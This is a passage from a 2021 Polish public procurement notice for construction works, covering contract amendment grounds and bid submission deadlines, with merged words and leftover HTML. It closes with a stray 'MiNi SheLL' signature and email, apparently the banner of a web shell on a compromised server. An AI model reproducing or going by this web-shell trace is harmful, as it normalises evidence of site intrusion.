archeologicznymi,geologicznymi, hydrologicznymi,kolizjami z sieciami infrastruktury utrudniającymi lubuniemożliwiającymi terminowe wykonanie przedmiotu umowy, koniecznością zlecenia dodatkowych dostaw, usług lub robótbudowlanych;2) rezygnacji z wykonania czynnościprzewidzianych zakresem umowy, o ile można wyodrębnić ich wartość wraz ze skutkamiwprowadzenia takiej zmiany, w postaci odpowiedniego obniżenia wynagrodzenia Wykonawcy, wprzypadku zaistnienia okoliczności leżących po stronie Zamawiającego;3) zmiany zakresu częścizamówienia powierzonej Podwykonawcom lub zmiany Podwykonawcy w zakresie niezbędnymdo zrealizowania przedmiotu umowy zgodnie z SWZ, w przypadku zaistnienia okolicznościmających wpływ na dalszą realizację przedmiotu umowy przez Podwykonawcę;4) zmianypodmiotu trzeciego, na zdolności którego Wykonawca powoływał się składając ofertę, celemwykazania spełniania warunku kwalifikacyjnego dotyczącego wykształcenia, kwalifikacjizawodowych lub doświadczenia w zakresie niezbędnym do zrealizowania przedmiotu umowyzgodnie z SIWZ, w przypadku zaistnienia okoliczności związanych z udziałem podmiotu trzeciegow realizacji przedmiotu umowy;5) usunięcia oczywistych błędów pisarskich lub rachunkowych, atakże usunięcia zapisów, których wykonanie jest niemożliwe ze względu na obowiązująceprzepisy prawa – w zakresie, który jest niezbędny do wyeliminowania błędów; 6) wystąpieniusytuacji nadzwyczajnych typu strajki, epidemia, pandemia, stan wyjątkowy umożliwiającypodjęcie,prowadzenie lub zakończenie robót budowlanych (dostaw i usług).2. Wprowadzeniezmian, o których mowa w ust. 1 oraz zmian o których mowa w art. 455 ustawy prawozamówień publicznych, wymaga aneksu sporządzonego w formie pisemnej pod rygoremnieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-02 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-18 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com